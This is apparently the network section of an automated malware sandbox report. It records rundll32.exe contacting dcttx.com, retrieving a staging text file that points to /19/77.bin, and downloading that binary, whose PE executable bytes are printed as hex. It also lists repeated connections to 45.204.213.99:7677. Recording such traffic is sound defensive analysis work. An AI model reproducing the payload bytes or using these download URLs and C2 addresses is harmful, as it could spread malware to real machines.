                            Dec 22, 2024 09:31:37.539927006 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:52.838906050 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:52.958441019 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:52.994940996 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:53.115113974 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:53.714457035 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:53.745491028 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:53.760890007 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:53.805946112 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:53.865091085 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:53.865658998 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:53.917139053 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:53.925827980 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:54.014677048 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:54.134185076 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:54.285800934 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:54.332468033 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:54.394356966 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:54.514004946 CET76774974145.204.213.99192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 22, 2024 09:28:59.828681946 CET4947553192.168.2.41.1.1.1
                            Dec 22, 2024 09:29:00.029417992 CET53494751.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 22, 2024 09:28:59.828681946 CET192.168.2.41.1.1.10x219Standard query (0)dcttx.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 22, 2024 09:29:00.029417992 CET1.1.1.1192.168.2.40x219No error (0)dcttx.com38.147.186.138A (IP address)IN (0x0001)false
                            • dcttx.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.44973038.147.186.1384436204C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-12-22 08:29:02 UTC56OUTGET /19/7.txt HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:02 UTC270INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:02 GMT
                            Content-Type: text/plain
                            Content-Length: 27
                            Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                            Connection: close
                            ETag: "67643bb7-1b"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:02 UTC27INData Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                            Data Ascii: https://dcttx.com/19/77.bin


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.44973138.147.186.1384436156C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-12-22 08:29:02 UTC56OUTGET /19/7.txt HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:02 UTC270INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:02 GMT
                            Content-Type: text/plain
                            Content-Length: 27
                            Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                            Connection: close
                            ETag: "67643bb7-1b"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:02 UTC27INData Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                            Data Ascii: https://dcttx.com/19/77.bin


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.44973238.147.186.1384436204C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-12-22 08:29:04 UTC57OUTGET /19/77.bin HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:05 UTC291INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:04 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 140288
                            Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                            Connection: close
                            ETag: "67643b7c-22400"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:05 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                            Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                            2024-12-22 08:29:05 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                            Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                            Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                            2024-12-22 08:29:05 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                            Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                            2024-12-22 08:29:05 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                            Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                            2024-12-22 08:29:05 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                            Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                            Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2024-12-22 08:29:05 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.44973438.147.186.1384436156C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-12-22 08:29:04 UTC57OUTGET /19/77.bin HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:05 UTC291INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:04 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 140288
                            Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                            Connection: close
                            ETag: "67643b7c-22400"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:05 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                            Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                            2024-12-22 08:29:05 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                            Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 dd 5d f8 dd 45 f8 59 dd 45 08 59 da e9 df e0 f6 c4 44 7a 0e 56 53 e8 18 40 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0c 6a 10 e8 9d 3d 00 00 83 c4 1c 5e 5b c9 c3 6a 0c 68 a0 7b 41 00 e8 7e 1f 00 00 6a 0e e8 47 42 00 00 59 83 65 fc 00 8b 75 08 8b 4e 04 85 c9 74 2f a1 b4 ae 41 00 ba b0 ae 41 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 a0 f0 ff ff 59 ff 76 04 e8 97 f0 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 6d 1f 00 00 c3 8b d0 eb c5 6a 0e e8 13 41 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4
                            Data Ascii: ]EYEYDzVS@EYY" uES\$E$jj=^[jh{A~jGBYeuNt/AAEt9u,HJPYvYfEmjAYT$L$u<:u.t&:au%t:Aut:au
                            2024-12-22 08:29:05 UTC16384INData Raw: 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 9b dd 7d fc 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 9b d9 7d fc 8b 45 0c 8b 4d 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d 30 93 41 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d 30 93 41 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d 3c 93 41 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 50 7c 41 00 e8 10 df ff ff 33 c0 39 05 dc eb 41 00 74 56 f6 45 08 40 74 48 39 05 48 93 41 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40
                            Data Ascii: E]UQ}EUQ}EUQ}EM#Mf#EfEmEUQQMt-0A]t-0A]t-<A]t t]jhP|A39AtVE@tH9HAt@EU.E=t=t33@
                            2024-12-22 08:29:05 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                            Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                            2024-12-22 08:29:05 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                            Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                            Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                            2024-12-22 08:29:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2024-12-22 08:29:05 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.44973338.147.186.1384431900C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-12-22 08:29:04 UTC56OUTGET /19/7.txt HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:05 UTC270INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:04 GMT
                            Content-Type: text/plain
                            Content-Length: 27
                            Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                            Connection: close
                            ETag: "67643bb7-1b"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
